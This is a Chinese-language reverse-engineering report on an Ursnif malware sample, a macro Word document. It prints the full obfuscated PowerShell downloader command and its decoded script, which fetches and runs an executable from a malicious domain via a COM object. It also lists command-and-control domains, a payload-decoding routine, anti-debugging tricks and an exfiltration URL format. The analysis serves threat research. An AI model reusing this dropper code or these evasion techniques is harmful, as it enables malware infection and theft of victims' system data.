ursnif
基本信息
样本名称 | 5f894602e88263e34dcdbb2eb2da3078.doc |
---|---|
样本类型 | doc |
恶意类型 | 蠕虫远控 |
MD5 | cc7ceb281d0780a1514f99a635ca35e4 |
SHA256 | 3122695bb31fa85dc8ff21b6f5f2ded5a1f306ea2520edafd44a653b2d277eef |
主要执行流程
程序启动doc宏读取AlternativeText隐藏的负载后启动powershell执行代码,下载文件并用ShellBrowserWindow启动下载的文件。
exe启动对数据段解码,运行数据段代码,数据段代码再解码PE代码,其中触发大量访问异常来进行反调试,隐藏恶意行为。解码后的PE代码映射shellcode
shellcode获取一些关键数据,加密成url的形式发送给CC
关键技术概览
- 联网行为
利用com组件启动IE来发送数据,启动exe也借助了com组件
- 异常反调试
加入了VEH向量,触发异常,干扰调试。
- 流量混淆
混入了一些正常的流量
详细分析
doc
宏代码加了混淆,调试代码
得到GetObject("new:0006F03A-0000-0000-C000-000000000046").CreateObject("Wscript.Shell").Run! fJjbjrHVMN,CInt(0)
此CLSID与outlook有关
InlineShape.AlternativeText隐藏了负载
cmd命令行用Debug.print打印出来为
cmD.exe /c P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsAIAAgAA0ACgANAAoAIAAgAGkAZgAoACQAbQAuAE4AYQBtAGUAIAAtAGUAcQAgACIARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAIgApAHsADQAKACAAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAJAB1AHIAaQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAoACIAaAB0AHQAcAA6AC8ALwBzAGUAYQB1AGoAMwA1AHkAdwBzAGcALgBjAG8AbQAvADIAcABvAGUAZgAxAC8AagAuAHAAaABwAD8AbAA9AHoAZQBwAGEAeAA2AC4AZgBnAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIA BbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABsAEsAQwBGAFoALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAI AAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAA0ACgB9AA0ACgANAAoARQB4AGkAdAA7AA0ACgANAAoA
其中powershell命令行base64解密一下
$instance = [System.Activator]::CreateInstance("System.Net.WebClient");
$method = [System.Net.WebClient].GetMethods();
foreach($m in $method){
if($m.Name -eq "DownloadData"){
try{
$uri = New-Object System.Uri("http://seauj35ywsg.com/2poef1/j.php?l=zepax6.fgs")
$response = $m.Invoke($instance, ($uri));
$path = [System.Environment]::GetFolderPath("CommonApplicationData") + "\\\\lKCFZ.exe";
[System.IO.File]::WriteAllBytes($path, $response);
$clsid = New-Object Guid \'C08AFD90-F2A1-11D1-8455-00A0C91F3880\'
$type = [Type]::GetTypeFromCLSID($clsid)
$object = [Activator]::CreateInstance($type)
$object.Document.Application.ShellExecute($path,$nul, $nul, $nul,0)
}catch{}
}
}
Exit;
ShellBrowserWindow启动下载的文件
exe
网络连接
利用COM组件构成一个进程外Internet Explorer对象的实例
https://www.fireeye.com/blog/threat-research/2010/08/reversing-malware-command-control-sockets.html
CLSID
IID
调用了IwebBrowser接口的Navigate方法
获取到一些域名
c58fdzlitzy.band
sa75robb.company
hkelleyae52.city
再用火绒监控一下,发现其有Http请求不过连接已经失效,且其中包含了一些正常流量躲避检测
动态调试
将.data段变成可读可写可执行,进行解码,解码算法大致如下,三组
初始密钥为E70FCE1D
翻译成伪C
int key=0xE70FCE1D
for(int i=0;i<0x956;i++)
{
if(i&3==0)
{
key=key&0xffff0000+((key&0xffff)*2)&0xffff;
ror(key,3)//循环左移3位
}
data_encode[i]=^(char)key;
ror(key,8)
}
GetCurrentProcessID
OpenProcess//
又对PE各个区段重新进行了解码,如果有下断点,程序就会触发异常,且调试时尽量F7单步调试
程序注册了VEH,且利用VirtualProtect修改属性触发了大量的访问冲突异常,进行反调试,VEH修改代码段属性且向代码段写入了数据,写入的数据为调用的API那些
调用GetModuleHanle时仍触发异常,需要将写入内存修改可读可写权限
创建内存镜像,句柄为0x90,创建
起始地址为0x500000,后经确认为shellcode
打开ntdll
读取导出表地址,LdrLoadDll LdrGetProcedureAddress
GetUserNameW
函数调用方式
call edi
LdrLoadDll
LdrGetProcedureAddress
jmp eax
GetComputerNameW
cpuid获取系统信息
0x522643
IE10RunOnceLastShown_TIMESTAMP发现字符串
soft=3&version=214071&user=d25f522aee878f97ea41ac1bbdb9aaa7&server=12&id=3261&crc=1&uptime=28121
将数据进行一系列异或运算之后,再进行base64编码,base64编码会将/替换为_2f +替换为 _2b得到的值随机插入’/'最后加上.avi前面补上域名和image
c58fdzlitzy.band/images/K_2Ferq85SD4wdyo/nPzb86ReUIgCMzq/bvAOE0gcOldJuu3tvq/GNOMZw8I0/Ntc43EVpiVoWeAKpau4X/emftHc8IkMLHDB_2+zO/xYun84veMNifPS4yKsJFXi/HbSgy0a4QhWRq/ad5_2+rD/8e05uC9AXiwTdkn/z.avi
利用com组件navigate将其发送给cc
cc由于没有响应,程序结束